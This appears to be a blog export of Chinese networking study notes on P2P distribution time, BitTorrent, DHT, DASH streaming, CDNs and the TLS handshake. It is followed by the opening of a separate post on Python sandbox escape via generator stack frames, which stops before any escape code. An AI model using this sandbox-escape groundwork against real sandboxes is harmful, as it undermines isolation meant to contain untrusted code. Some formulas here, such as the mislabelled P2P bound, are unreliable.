为了将客户-服务器体系结构与P2P体系结构进行比较,阐述P2P的内在自扩展性,我们现在考虑一个用于两种体系结构类型的简单定量模型，将一个文件分发给一个固定对等方集合。如图2-21所示,服务器和对等方使用接入链路与因特网相连。其中$u_s$表示服务器接入链路的上载速率,$u_i$表示第i对等方接入链路的上载速率,$d_i$表示第i对等方接入链路的下载速率。用F表示被分发的文件长度(以bit计),N表示要获得该文件副本的对等方的数量。分发时间(distribution time)是所有N个对等方得到该文件的副本所需要的时间。在下面分析分发时间的过程,我们对客户-服务器和P2P体系结构做了简化(并且通常是准确的[Akela 2003])的假设,即因特网核心具有足够的带宽,这意味着所有瓶颈都在网络接入链路。我们还假设服务器和客户没有参与任何其他网络应用,因此它们的所有上传和下载访问带宽能被全部用于分发该文件。

我们首先来确定对于客户-服务器体系结构的分发时间,我们将其表示为$D_{cs}$。在客户-服务器体系结构,没有对等方帮助分发文件。那么情况大致如下：

服务器必须向N个对等方的每个传输该文件的一个副本。因此该服务器必须传输NF bit量值的数据。因为该服务器的上载速率是$u_s$,分发该文件的时间必定至少为$NF/u_{s}$。
令$d_{min}$表示具有最小下载速率的对等方的下载速率,即$d_{min}=min{d_1, d_2, …, d_N}$。具有最小下载速率的对等方不可能在少于$F/d_{min}$s的时间内获得该文件的所有F bit。因此最小分发时间至少为$F/d_{min}$s。

将以上两条综合，我们就可以得到：$$D_{cs} \geqslant max\lbrace\frac{NF}{u_s}, \frac{F}{d_{min}}\rbrace$$ 该式提供了对于客户-服务器体系结构的最小分发时间的下界。因此我们取上面提供的这个下界作为实际发送时间,即下式(2-1)：$$D_{cs} = max\lbrace\frac{NF}{u_s},\frac{F}{d_{min}}\rbrace$$ 我们从式(2-1)看到，对于足够大的N，客户-服务器分发时间由$ND/u_s$确定。所以，该分发时间随着对等方N的数量线性地增加。因此举例来说,如果从某星期到下星期对等方的数量从1000增加了到了100万,将该文件分发到所有对等方所需要的时间就要增加1000倍。

我们现在来对P2P体系结构进行简单的分析,其中每个对等方能够帮助服务器分发该文件。特别是当一个对等方接收到某些文件数据,它能够使用自己的上载能力重新将数据分发给其他对等方。计算P2P体系结构的分发间在某种程度上比计算客户-服务器体系结构的更为复杂,因为分发时间取决于每个对等方如何向其他对等方分发该文件的各个部分。无论如何,能够得到对该最小分发时间的一个简单表达式[Kumar 2006]。至此,我们先做如下观察:

在分发的开始，只有服务器具有文件。为了使社区的这些对等方得到该文件，该服务器必须经其接入链路至少发送该文件的额每个bit一次。因此，最小分发时间至少是$F/u_s$。(与客户-服务器方案不同，由服务器发送过一次的比特可能不必由该服务器再次发送，因为对等方在它们之间可以重新分发这些比特。)
与客户-服务器体系结构相同，具有最低下载速率的对等方不能够以小于$F/d_{min}$s的分发时间获得所有F bit。因此最小分发时间至少为$F/d_{min}$。
最后，观察到系统整体的总上载能力等于服务器的上载速率加上每个单独的对等方的上载速率,即$u_{total}=u_s+u_1+…+u_N$。整个系统必须向这N个对等方交付F bit的数据，因此总共交付NF bit。这不能以快于$u_{total}$的速率完成。因此，最小的分发时间也至少是$NF/(u_s+u_1+…+u_N)$。

将这三项观察放在一起，我们获得了对P2P的最小分发时间，表达为$D_{P2P}$(下式记作式2-2)。$$D_{cs} \geqslant max\lbrace\frac{F}{u_s},\frac{F}{d_{min}},\frac{NF}{u_s+\sum_{i=1}^Nu_i}\rbrace$$ 式(2-2)提供了对于P2P体系结构的最小分发时间的下界。这说明，如果我们认为一旦每个对等方接收到一个比特就能够重分发一个比特的话,则存在一个重新分发方案能实际取得这种下界[Kumar 2006]。实际上，备份发的是文件块而不是一个个bit。式(2-2)能够作为1实际最小分发时间的近似值。

图2-22比较了客户-服务器和P2P体系结构的最小分发时间,其中假定所有的对等方具有相同的上载速率u。在图2-22中,我们已经设置了F/u=1小时，$u_s=10u, d_{min} \geqslant u_s$。即在一个小时中一个对等方能够传输整个文件，该服务器的传输速率是对等方上载速率的10倍，并且对等方的下载速率被设置得足够大，使之不会产生影响。我们从图2-22中看到,对于客户-服务器体系结构,随着对等方数量的增加,分发时间呈线性增长并且没有界。然而,对于P2P体系结构,最小分发时间不仅总是小于客户-服务器体系结构的分发时间,并且对于任意的对等方数量N,总是小于1小时。因此,具有P2P体系结构的应用程序能够是自扩展的。这种扩展性的直接成因是：对等方除了是比特的消费者外还是它们的重新分发者。

2.BitTorrent

BitTorrent是一种用于文件分发的流行P2P协议[Chao 2011]。用BitTorment的术语来讲,参与一个特定文件分发的所有对等方的集合被称为一个洪流(torrent)。在一个洪流中的对等方彼此下载等长度的文件块(chunk),典型的块长度为256KB。当一个对等方首次加入一个洪流时,它没有块。随着时间的流逝,它累积了越来越多的块。当它下载块时,也为其他对等方上载了多个块。一且某对等方获得了整个文件,它也许离开潜流,或留在该洪流中并继续向其他对等方上载块。同时,任何对等方可能在仅具有块的子集的情况下就离开该洪流,并在以后重新加入该洪流中。

我们现在更为仔细地观察BitTorrent运行的过程。因为BitTorrent是一个相当复杂的协以,所以我们将仅描述它最重要的机制。每个洪流具有一个基础设施节点,称为追踪器(tracker)。当一个对等方加入某洪流时,它向追踪器注册自己,并周期性地通知追踪器它仍在该洪流中。以这种方式,追踪器跟踪参与在洪流中的对等方。一个给定的洪流可能在任何时刻具有数以百计或数以千计的对等方。

如图2-23所示,当一个新的对等方Alice加入该洪流时,追踪器随机地从参与对等方的集合中选择对等方的一个子集(为了具体起见,设有50个对等方),并将这50个对等方的了IP地址发送给Alice。Alice持有对等方的这张列表,试图与该列表上的所有对等方创建并行的TCP连接。我们称所有这样与Alice成功地创建一个TCP连接的对等方为“邻近对等方”(在图2-23中,Alice显示了仅有三个邻近对等方。通常,她应当有更多的对等方)。随着时间的流逝,这些对等方中的某些可能离开,其他对等方(最初50个以外的)可能试图与Alice创建TCP连接。因此一个对等方的邻近对等方将随时间而波动。

在任何给定的时,每个对等方将具有来自该文件的块的子集,并且不同的对等方具有不同的子集。Alice周期性地(经TCP连接)询问每个邻近对等方它们所具有的块列表。如果Alice具有L个不同的邻居,她将获得L个块列表。有了这个信息,Alice将对她当前还没有的块发出请求(仍通过TCP连接)。

因此在任何给定的时刻,Alice将具有块的子集并知道它的邻居具有哪些块。利用这些信息,Alice将做出两个重要决定。第一,她应当从她的邻居请求哪些块?第二,她应当向哪些向她请求块的邻居发送块?在决定请求哪些块的过程中,Alice使用一种称为最稀缺优先(rarest first)的技术。这种技术的思路是,针对她没有的块在她的邻居中决定最稀缺的块(最稀缺的块就是那些在她的邻居中副本数量最少的块)并首先请求那些最稀缺的块。这样,最稀缺块得到更为迅速的重新分发,其目标是(大致地)均衡每个块在洪流中的副本数量。

为了决定她响应哪个请求,BitTorrent使用了一种机灵的对换算法。其基本想法是,Alice根据当前能够以最高速率向她提供数据的邻居,给出其优先权。特别是,Alice对于她的每个邻居都持续地测量接收到比特的速率,并确定以最高速率流入的4个邻居。每过10秒,她重新计算该速率并可能修改这4个对等方的集合。用BitTorrent术语来说,这4个对等方被称为疏通(unchoked)。重要的是,每过30秒,她也要随机地选择另外一个邻居并向其发送块。我们将这个被随机选择的对等方称为Bob。因为Alice正在向Bob发送数据,她可能成为Bob前4位上载者之一,这样的话Bob将开始向Alice发送数据。如果Bob向Alice发送数据的速率足够高,Bob接下来也能成为Alice的前4位上载者。换言之,每过30秒Alice将随机地选择一名新的对换伴侣并开始与那位伴侣进行对换。如果这两名对等方都满足此对换,它们将对方放入其前4位列表中并继续与对方进行对换,直到该对等方之一发现了一个更好的伴侣为止。这种效果是对等方能够以趋向于找到彼此的协调的速率上载。随机选择邻居也人允许新的对等方得到块,因此它们能够具有对换的东西。除了这5个对等方(前4个对等方和一个试探的对等方)的所有其他相邻对等方均被“阻塞”,即它们不能从Alice接收到任何块。BitTorrent有一些有趣的机制没有在这里讨论,包括片(小块)、流水线、随机优先选择、残局模型和反念慢[Cohen 2003]。

刚刚描述的关于交换的激励机制常被称为“一报还一报”(tit-for-tat)[Cohen 2003]。已证实这种激励方案能被回避[Liogkas 2006;Locher 2006;Piatek 2008]。无论如何,BitTorrent“生态系统”取得了广泛成功,数以百万计的并发对等方在数十万条洪流中积极地共享文件。如果BitTorrent被设计为不采用一报还一报(或一种变种),然而在别的方面却完全相同的协议,BitTorrent现在将很可能不复存在了,因为大多数用户将成为搭便车者了[Sarouiu 2002]。

我们简要地提一下另一种P2P应用——分布式散列表(DHT)来结束我们的讨论。分布式散列表是一种简单的数据库,其数据库记录分布在一个P2P系统的多个对等方上。DHT得到了广泛实现(如在BitTorrent中),并成为大量研究的主题.

以下内容来自分布式哈希表 (DHT) 和 P2P 技术

早期的一种P2P网络采取了不同的策略,它不设置中央服务器;当用户请求资源时,它会请求它所有的邻接节点,邻接节点再依次请求各自的邻接节点,并使用一些策略防止重复请求,直到找到拥有资源的节点.也就是说,这是一种泛洪搜索(Flooding Search).
这种P2P网络去除了中央服务器, 它的稳定性就强多了. 然而它太慢了. 一次查找可能会产生大量的请求, 可能会有大量的节点卷入其中. 一旦整个系统中的的节点过多, 性能就会变得很差.
为了解决这些问题, 分布式哈希表(即前文提到的分布式散列表)应运而生. 在一个有n个节点的分布式哈希表中, 每个节点仅需存储$O(lg⁡n)$个其他节点, 查找资源时仅需请求$O(lg⁡n)$个节点, 并且无需中央服务器, 是一个完全自组织的系统.
地址管理
首先, 在分布式哈希表中, 每个节点和资源都有一个唯一标识, 通常是一个160位整数. 为方便起见, 我们称节点的唯一标识为ID, 称资源的唯一标识为Key. 我们可以把一个节点的IP地址用SHA-1算法哈希得到这个节点的ID; 同样地, 把一个资源文件用SHA-1算法哈希就能得到这个资源的Key了.
定义好ID和Key之后, 就可以发布和存储资源了. 每个节点都会负责一段特定范围的Key, 其规则取决于具体的算法. 例如, 在Chord算法中, 每个Key总是被第一个ID大于或等于它的节点负责. 在发布资源的的时候, 先通过哈希算法计算出资源文件的Key, 然后联系负责这个Key的节点, 把资源存放在这个节点上. 当有人请求资源的时候, 就联系负责这个Key的节点, 把资源取回即可.
发布和请求资源有两种做法, 一种是直接把文件传输给负责的节点, 由它存储文件资源; 请求资源时再由这个节点将文件传输给请求者. 另一种做法是由发布者自己设法存储资源, 发布文件时把文件所在节点的地址传输给负责的节点, 负责的节点仅存储一个地址; 请求资源的时候会联系负责的节点获取资源文件的地址, 然后再取回资源. 这两种做法各有优劣. 前者的好处是资源的发布者不必在线, 请求者也能获取资源; 坏处是如果文件过大, 就会产生较大的传输和存储成本. 后者的好处是传输和存储成本都比较小, 但是资源的发布者, 或者说资源文件所在的节点必须一直在线.
路由算法
上面我们简述了地址系统,以及如何发布和取回资源.但是现在还有一个大问题:如何找到负责某个特定Key的节点呢? 这里就要用到路由算法了.不同的分布式哈希表实现有不同的路由算法,但它们的思路是一致的.
首先每个节点会路由若干个其他节点的联系方式(IP地址,端口), 称之为路由表. 一般来说一个有着n个节点的分布式哈希表中, 一个节点的路由表的长度为$O(lg⁡n)$.每个节点都会按照特定的规则构建路由表, 最终所有的节点会形成一张网络.从一个节点发出的消息会根据特定的路由规则,沿着网络逐步接近目标节点,最终达到目标节点.在有着n个节点的分布式哈希表中, 这个过程的转发次数通常为$O(lg⁡n)$次.
自我组织(self-organization)
分布式哈希表中的节点都是由各个用户组成,随时有用户加入,离开或失效;并且分布式哈希表没有中央服务器,也就是说着这个系统完全没有管理者.这意味着分配地址,构建路由表,节点加入,节点离开,排除失效节点等操作都要靠自我组织策略实现.
要发布或获取资源,首先要有节点加入.一个节点加入通常有以下几步.首先,一个新节点需要通过一些外部机制联系分布式哈希表中的任意一个已有节点;接着新节点通过请求这个已有节点构造出自己的路由表,并且更新其他需要与其建立连接的节点的路由表;最后这个节点还需要取回它所负责的资源.
此外我们必须认为节点的失效是一件经常发生的事,必须能够正确处理它们.例如,在路由的过程中遇到失效的节点,会有能够替代它的其他节点来完成路由操作;会定期地检查路由表中的节点是否有效;将资源重复存储在多个节点上以对抗节点失效等.另外分布式哈希表中的节点都是自愿加入的,也可以自愿离开.节点离开的处理与节点失效类似,不过还可以做一些更多的操作,比如说立即更新其他节点的路由表,将自己的资源转储到其他节点等.

#视频流和内容分发网

众多评估数据显示,包括Netflix、YouTube和亚马逊Prime在内的流式视频,大约占2020年因特网流量的80%[Cisco 2020]。在本节中,我们将概述流行的视频流式服务在今天的因特网中是如何实现的。我们将看到,其实现使用了应用层协议,以及以某种方式起到高速缓存作用的服务器。

#因特网视频

在流式存储视频应用中,基础的媒体是预先录制的视频,例如电影、电视节目、录制好的体育事件或录制好的用户生成的视频(如通常在YouTube上可见的那些)。这些预先录制好的视频放置在服务器上,用户按需向这些服务器发送请求来观看视频。许多因特网公司现在提供流式视频,这些公司包括Netflix、YouTube(谷歌)、亚马逊和抖音等。

但在开始讨论视频流之前,我们先迅速感受一下视频媒体。视频是一系列的图像,通常以一种恒定的速率(如每秒24或30张图像等)来展现。一幅未压缩、数字编码的图像由像素阵列组成,其中每个像素由一些比特编码来表示亮度和颜色。视频的一个重要特征是能够被压缩,因而可用比特率来权衡视频质量。今天现成的压缩算法能够将一个视频压缩成所希望的任何比特率。当然,比特率越高,图像质量越,用户的总体视觉感受越好。

从网络的观点看,也许视频最为突出的特征是高比特率。压缩的因特网视频的比特率范围通常从用于低质量视频的100kbps,到用于流式高分辩率电影的超过4Mbps,再于4K在线播放的超过10Mbps。到用这能够转换为巨大的流量和存储,特别是对高端视频。例如,单一2Mbps视频在67分钟期间将耗费1GB的存储和流量。到目前为止,对流式视频的最为重要的性能度量是平均端到端吞吐量。为了提供连续不断的播放,网络必须为流式应用提供平均吞吐量,这个流式应用至少与压缩视频的比特率一样大。

我们也能使用压缩生成相同视频的多个版,每个版本有不同的质量等级。例如,我们能够使用压缩生成相同视频的3个版本,比特率分别为300kbps、1Mbps和3Mbps。用户则能够根据他们当前可用带宽来决定观看哪个版本。具有高速因特网连接的用户也许选择3Mbps版本,使用智能手机通过3G观看视频的用户可能选择300kbps版本。

#HTTP流和DASH

在HTTP流中,视频只是存储在HTTP服务器中作为一个普通的文件,每个文件有一个特定的URL。当用户要看该视频时,客户与服务器创建一个TCP连接并发送对该URL的HTTP GET请求。服务器则以底层网络协议和流量条件允许的尽可能快的速率,HTTP响应报文中发送该视频文件。在客户一侧,字节被收集在客户应用缓存中。一旦该缓存中的字节超过预先设定的门限，客户应用程序就开始播放，特别是，流式视频应用程序周期性地从客户应用程序缓存中抓取帧，对这些帧解压缩并且在用户屏幕上展现。因此，流式视频应用接收到视频就进行播放，同时缓存该视频后面部分的帧。

如前一小节所述,尽管HTTP流在实践中已经得到广泛部署(例如,自YouTube发展初期开始)，但它有严重缺陷,即所有客户接收到相同编码的视频,尽管对不同的客户或者对于相同客户的不同时间而言,客户可用的带宽大小有很大不同。这导致了一种新型的基于HTTP的流的研发,它常常被称为经HTTP的动态适应性流(Dynamic Adaptive Steaming over HTTP,DASH)。在DASH中视频编码为几个不同的版本,其中每个版本具有不同的比特率,对应于不同的质量水平。客户动态地请求来自不同版本且长度为几秒的视频段数据块。当可用带宽量较高时,客户自然地选择来自高速率版本的块;当可用带宽量较低,客户自然地选择来自低速率版本的块。客户用HTTP GET请求报文一次选择一个不同的块[Akhshabi 2011]。DASH允许客户使用不同的因特网接入速率来流式播放不同编码速率的视频。使用低速3G连接的客户能够接收低比特率(和低质量)的版本,使用光纤连接的客户能够接收高质量的版本。如果端到端带宽在会话过程中改变的话,DASH人允许客户适应可用带宽。这种特色对于移动用户特别重要,当移动用户相对于基站移动,通常他们能感受到其可用带宽的波动。

使用DASH后,0HTTP服务器,每个版本都有一个不同的URL。HTTP服务器也有一个告示文件(manifest file),为每个版本提供了一个URL及其比特率。客户首先请求该告示文件并且得知各种各样的版本。然后客户通过在HTTP GET请求报文中对每块指定一个URL和一个字节范围，一次选择一块。在下载块的同时，客户也测量接受带宽并运行一个速率决定算法来选择下次请求的块。自然地，如果客户缓存地视频很多，并且测量到的接受带宽较高，它将选择一个高速率的版本。同样，如果用户缓存的视频很少，并且测量的接受带宽较低，它将选择一个低速率的版本。因此DASH允许客户自由地在不同的质量等级之间切换。

#内容分发网

今天,许多因特网视频公司日复一日地向数以百万计的用户按需分发每秒数兆比特的流。向位于全世界的所有用户流式传输所有流量同时提供连续播放和高交互性显然是一项有挑战性的任务。

对于一个因特网视频公司,或许提供流式视频服务最为直接的方法是建立单一的大规模数据中心,在数据中心中存储其所有视频,并直接从该数据中心向世界范围的客户传输流式视频。但是这种方法存在三个问题。

首先，如果客户远离数据中心,服务器到客户的分组将跨越许多通信链路并很可能通过许多ISP,其中某些ISP可能位于不同的大洲,如果这些链路之一提供的春吐量小于视频消耗速率,端到端吞吐量也将小于该消耗速率,给用户带来恼人的停滞时延。(第1章讲过,一条流的端到端吞吐量由瓶颈链路的吞吐量所决定)出现这种事件的可能性随着端到端路径中链路数量的增加而增加。
第二个缺陷是流行的视频很可能经过相同的通信链路发送许多次。这不仅浪费了网络带宽,因特网视频公司自己也将为向因特网反复发送相同的字节而向其ISP支付费用。
第三个问题是单个数据中心代表一个单点故障,如果数据中心或其通向因特网的链路崩溃,它将不能够分发任何视频流了。

为了应对向分布于全世界的用户分发巨量视频数据的挑成,几乎所有主要的视频流公司都使用了CDN。CDN管理分布在多个地理位置上的服务器,在它的服务器中存储视频(和其他类型的Web内容,包括文档、图片和音频)的副本,并且试图将所有用户请求定向到一个提供最好用户体验的CDN位置。CDN可以是专用CDN(private CDN),即由内容提供商自己所拥有,例如谷歌的CDN分发YouTube视频和其他类型的内容。CDN还可以是第三方CDN(third-party CDN),它代表多个内容提供商分发内容,Akamai、Limelight和Level-3都选择第三方CDN。

CDN通常采用两种不同的服务器安置原则:

深入：第一个原则由Akamai首创,该原则是通过在遍及全球的接入ISP中部署服务器集群来深入到ISP的接入网中。Akamai在数以千计个位置采用这种方法部署集群。其目标是靠近端用户,通过减少端用户和CDN集群之间的链路和路由器的数量,从而改善了用户感受的时延和吞吐量。因为这种高度分布式设计,维护和管理集群的任务成为挑战。
邀请做客：第二个设计原则由Limelight和许多其他CDN公司所采用,该原则是通过在少量(例如10个)关键位置建造大集群来邀请到ISP做客(即与ISP进行数据的交换，更接近ISP)。不是将集群放在接入ISP中这些CDN通常将它们的集群放置在因特网交换点(IXP)。与深入设计原则相比,邀请做客设计通常产生较低的维护和管理开销,但是可能对端用户造成较高时延和较低吞吐量。

接入网指的是骨干网络到端用户之间的网络连接。
互联网交换中心（Internet Exchange Point，IXP）是一种物理基础设施，用于在不同的互联网服务提供商（ISP）和内容分发网络（CDN）之间交换互联网流量。

一旦CDN的集群准备就绪,它就可以跨集群复制内容。CDN可能不希望将每个视频的副本放置在每个集群,因为某些视频很少被观看或仅在某些国家中流行。事实上,许多CDN没有将视频推人它们的集群,而是使用一种简单的拉策略:如果客户向一个未存储该视频的集群请求某视频,则该集群(从某中心仓库或者从另一个集群)检索该视频,向客户流式传输视频的同时在本地存储一个副本。类似于Web缓存,当某集群存储器变满时,它删除不经常请求的视频。

1.CDN操作

在讨论过这两种部署CDN的重要方法后,我们现在深入看看CDN操作的细节。当用户主机中的一个浏览器指令检索一个特定的视频(由URL标识)时,CDN必须截获该请求,以便能够进行以下操作：

确定此时适合用于该客户的CDN服务器集群
将客户的请求重定向到该集群的某台服务器

我们很快将讨论CDN是如何能够确定一个适当的集群的。但是我们首先考察截获和重定向请求所依赖的机制。

大多数CDN利用DNS来截获和重定向请求。我们考虑用一个简单的例子来说明通常是怎样使用DNS的。假定有一个内容提供商NetCinema,雇用了第三方CDN公司KingCDN来向其客户分发视频。在NetCinema的Web网页上,它的每个视频都被指派了一个URL,该URL包括字符串“video”以及该视频本身的独特标识符。例如,变形金刚7可以指派为http://video.netcinema.com/6Y7B23V。接下来出现如图2-24所示的6个步骤:

用户访问位于NetCinema的Web网页。
当用户点击链接http://video.netcinema.com/6Y7B23V时该用户主机发送了一个对于video.netcinema.com的DNS请求。
用户的本地DNS服务器(LDNS)将该DNS请求中继到一台用于NetCinema的权威DNS服务器,该服务器观察到主机名video.netcinema.com中的字符串“video”(存在CNAME记录使得该url被映射为指定url)。为了将该DNS请求移交给KingCDN,NetCinema权威DNS服务了将该DNS请求移交给KingCDN，NetCinema权威DNS服务器并不返回一个IP地址,而是向LDNS返回一个KingCDN域的主机和名,如a1105.kingcdn.com。
从这时起,DNS请求进入了KingCDN专用DNS基础设施。用户的LDNS则发送第二个请求,此时是对a1105.kingcdn.com的DNS请求,KingCDN的DNS系统最终向LDNS返回KingCDN内容服务器的IP地址。所以正是在这里,在KingCDN的DNS系统中,指定了CDN服务器,客户将能够从这人台服务器接收到它的内容。
LDNS向用户主机转发内容服务CDN节点的IP地址。
一旦客户收到KingCDN内容服务器的IP地址,它与具有该IP地址的服务器创建了一条直接的TCP连接,并且发出对该视频的HTTPGET请求。如果使用了DASH,服务器将首先向客户发送具有URL列表的告示文件,每个URL对应视频的每个版本,并且客户将动态地选择来自不同版本的块。

2.集群选择策略

任何CDN部署，其核心都是集群选择策略(cluster selection strategy),即动态地将客户定向到CDN中的某个服务器集群或数据中心的机制。如我们刚才所见，经过客户的DNS查找，CDN得知了该客户的LDNS服务器的IP地址。在得知该IP地址之后，CDN需要基于该IP地址选择一个适当的集群。CDN一般采用专用的集群选择策略。我们现在简单地介绍一些策略，每种策略都有优缺点。

一种简单的策略是指派用户到地理上最为邻近(geographically closest)的集群。使用商用地理位置数据库，每个LDNS IP地址都映射到一个地理位置。当从一个特殊的LDNS接受到一个DNS请求时，CDN选择地理上最为接近的集群，即离LDNS最少几千米远的集群，“就像鸟飞一样”。这样的解决方案对于众多用户来说能够工作的相当好。但对某些用户，该解决方案可能执行效果比较差，因为就网络路径的长度或跳数而言，地理最邻近的集群可能并不是最近的集群。此外，所有基于DNS的方法都具有的问题时，某些端用户配置使用位于远地的LDNS，在这种情况下，LDNS位置可能远离客户的位置。此外,这种简单的策略忽略了时延和可用带宽随因特网路径时间而变化,总是为特定的客户指派相同的集群。

为了基于当前流量条件为客户确定最好的集群,CDN能够对其集群和客户之间的时延和丢包性能执行周期性的实时测量(real-time measurement)。例如,CDN能够让它的每个集群周期性地向位于全世界的所有LDNS发送探测分组(例如,ping报文或DNS请求)。这种方法的一个缺点是许多LDNS被配置为不响应这些探测。

#SSL/TLS

该部分为额外内容,参考:
HTTPS详解二：SSL/TLS工作原理和详细握手过程
一篇文章让你彻底弄懂SSL/TLS协议

#什么是SSL

SSL（Secure Sockets Layer） 是一种用于在网络上保护信息安全的标准安全技术。它通过对网络连接进行加密来确保数据在客户端和服务器之间的安全传输。SSL协议使用了非对称加密和对称加密技术，可以防止数据在传输过程中被窃取或篡改。

HTTP在传输数据时使用的是明文是不安全的，为了解决这一隐患，网景公司(Netscape)推出了SSL安全套接字协议层。SSL是基于HTTP之下，TCP之上的一个协议层，是基于HTTP标准并对TCP传输数据时进行加密，所以HPPTS即HTTP+SSL/TLS，Https默认使用端口443。

#SSL协议组成

SSL协议由SSL记录协议和SSL握手协议组成。

SSL记录协议（SSL Record Protocol）：它建立在可靠的传输协议（如TCP）之上，为高层协议提供数据封装、压缩、加密等基本功能的支持。
SSL握手协议（SSL Handshake Protocol）：它建立在SSL记录协议之上，用于在实际的数据传输开始前，通讯双方进行身份认证、协商加密算法、交换加密密钥等。

#什么是TLS

TLS(Transport Layer Security)是IETF在SSL3.0基础上设计的协议，实际上相当于SSL的后续版本。SSL/TLS是一个安全通信框架，上面可以承载HTTP协议或者SMTP/POP3协议等。

#TLS协议的架构

TLS主要分为两层，下层是TLS记录协议，主要负责使用对称密码对消息进行加密。上层是TLS握手协议，主要分为如图的4个部分。

握手协议负责在客户端和服务器端商定密码算法和共享密钥，包括证书认证，是4个协议中最最复杂的部分。
密码规格变更协议负责向通信对象传达变更密码方式的信号
警告协议负责在发生错误的时候将错误传达给对方
应用数据协议负责将TLS承载的应用数据传达给通信对象的协议。

#TLS握手流程

对图中的流程有如下解释：

Client Hello:客户端向服务端发送hello消息,包括以下内容:
- 可用版本号
- 当前时间
- 客户端随机数
- 会话ID
- 可用的密码套件清单
- 可用的压缩方式清单

之前提到了TLS其实是一套加密框架，其中的有些组件其实是可以替换的，这里的可用版本号，可用的密码套件清单，可用的压缩方式清单就是向服务器询问对方支持哪些服务。

Server Hello:服务端收到客户端的hello后会返回一个hello，包含以下内容：
- 使用的版本号
- 当前时间
- 服务器随机数
- 会话ID
- 使用的密码套件
- 使用的压缩方式
  使用的版本号，使用的密码套件，使用的压缩方式是对步骤1的回答。服务器随机数是一个由服务器端生成的随机数，用来生成对称密钥。
certificate(S2C):服务器端发送自己的证书清单，因为证书可能是层级结构的，所以处理服务器自己的证书之外，还需要发送为服务器签名的证书。客户端将会对服务器端的证书进行验证。如果是以匿名的方式通信则不需要证书。
ServerKeyExchange:如果certificate的证书信息不足，则可以发送ServerKeyExchange用来构建加密通道。
ServerKeyExchange的内容可能包含两种形式：
- 如果选择的是RSA协议，那么传递的就是RSA构建公钥密码的参数(E,N)。
- 如果选择的是Diff-Hellman密钥交换协议，那么传递的就是密钥交换的参数。
CertificateRequest:如果是在一个受限访问的环境，比如fabric(区块链框架,可以部署区块链应用程序)中，服务器端也需要向客户端索要证书。如果并不需要客户端认证，则不需要此步骤。
server hello done:服务器端发送server hello done的消息告诉客户端自己的消息结束了。
Certificate(C2S):对步骤5的回应，客户端发送客户端证书给服务器。
ClientKeyExchange:
- 如果是公钥或者RSA模式情况下，客户端将根据客户端生成的随机数和服务器端生成的随机数，生成预备主密码，通过该公钥进行加密，返回给服务器端。
- 如果使用的是Diff-Hellman密钥交换协议，则客户端会发送自己这一方要生成Diff-Hellman密钥而需要公开的值，这样服务器端可以根据这个公开值计算出预备主密码。
CertificateVerify:客户端向服务器端证明自己是客户端证书的持有者。
ChangeCipherSpec(C2S):ChangeCipherSpec是密码规格变更协议的消息，表示后面的消息将会以前面协商过的密钥进行加密。
Finished:客户端告诉服务器端握手协议结束了。
ChangeCipherSpec(S2C):服务器端告诉客户端自己要切换密码了。
Finished:服务器端告诉客户端，握手协议结束了。
切换到应用数据协议,这之后服务器和客户端就是以加密的方式进行沟通了。

#主密码和预备主密码

上面的步骤8生成了预备主密码，主密码是根据密码套件中定义的单向散列函数实现的伪随机数生成器+预备主密码+客户端随机数+服务器端随机数生成的。主密码主要用来生成称密码的密钥，消息认证码的密钥和对称密码的CBC模式所使用的初始化向量。

#TLS记录协议

TLS记录协议主要负责消息的压缩，加密及数据的认证：

消息首先将会被分段，然后压缩，再计算其消息验证码(MAC值)，然后使用对称密码进行加密，加密使用的是CBC模式，CBC模式的初始向量是通过主密码来生成的。得到密文之后会附加类型，版本和长度等其他信息，最终组成最后的报文数据。

Python沙箱逃逸

2025-05-15T05:01:56.000Z

#python沙箱逃逸

#生成器栈帧逃逸

本节参考：
python栈帧沙箱逃逸
Why are python generator frames’ (gi_frame) f_back attribute always none?

#生成器

生成器（Generator）是 Python 中一种特殊的迭代器，它可以通过简单的函数和表达式来创建。生成器的主要特点是能够逐个产生值，并且在每次生成值后保留当前的状态，以便下次调用时可以继续生成值。这使得生成器非常适合处理大型数据集或需要延迟计算的情况。

在 Python 中，生成器可以通过两种方式创建：

生成器函数：定义一个函数，使用 yield 关键字生成值，每次调用生成器函数时，生成器会暂停并返回一个值，下次调用时会从暂停的地方继续执行。

def my_generator():    yield 1    yield 2    yield 3gen = my_generator()print(next(gen)) # 第一次调用，输出 1print(next(gen)) # 第二次调用，输出 2print(next(gen)) # 第三次调用，输出 3

生成器表达式：使用类似列表推导式的语法，但使用圆括号而不是方括号，可以用来创建生成器对象。生成器表达式会逐个生成值，而不是一次性生成整个序列，这样可以节省内存空间，特别是在处理大型数据集时非常有用。
```
gen = (x*x for x in range(5))print(list(gen))  # 输出 [0, 1, 4, 9, 16]
```

#栈帧

在 Python 中，栈帧(stack frame)，也称为帧(frame)，是用于执行代码的数据结构。每当 Python 解释器执行一个函数或方法时，都会创建一个新的栈帧，用于存储该函数或方法的局部变量、参数、返回地址以及其他执行相关的信息。这些栈帧会按照调用顺序被组织成一个栈，称为调用栈。

栈帧包含了以下几个重要的属性：
f_locals: 一个字典，包含了函数或方法的局部变量。键是变量名，值是变量的值。
f_globals: 一个字典，包含了函数或方法所在模块的全局变量。键是全局变量名，值是变量的值。
f_code: 一个代码对象（code object），包含了函数或方法的字节码指令、常量、变量名等信息。
f_lasti: 整数，表示最后执行的字节码指令的索引。
f_back: 指向上一级调用栈帧的引用，用于构建调用栈。

#生成器属性

gi_code: 生成器对应的code对象。
gi_frame: 生成器对应的frame（栈帧）对象。
gi_running: 生成器函数是否在执行。生成器函数在 yield 以后、执行 yield 的下一行代码前处于 frozen 状态，此时这个属性的值为0。
gi_yieldfrom：如果生成器正在从另一个生成器中 yield 值，则为该生成器对象的引用；否则为 None。
gi_frame.f_locals：一个字典，包含生成器当前帧的局部变量。

着重介绍一下 gi_frame 属性。gi_frame 是一个与生成器（generator）相关的属性。它指向生成器当前执行的帧对象（frame object），如果这个生成器正在执行的话。帧对象表示代码执行的当前上下文，包含了局部变量、执行的字节码指令等信息。

def my_generator():    yield 1    yield 2    yield 3gen = my_generator()# 获取生成器的当前帧信息frame = gen.gi_frame# 输出生成器的当前帧信息print("Local Variables:", frame.f_locals)print("Global Variables:", frame.f_globals)print("Code Object:", frame.f_code)print("Instruction Pointer:", frame.f_lasti)

同理利用gi_code属性也可以获得生成器的相关代码对象属性：

def my_generator():    yield 1    yield 2    yield 3gen = my_generator()# 获取生成器的当前代码信息code = gen.gi_code# 输出生成器的当前代码信息print(code.co_name)print(code.co_code)print(code.co_consts)print(code.co_filename)

#利用生成器栈帧沙箱逃逸

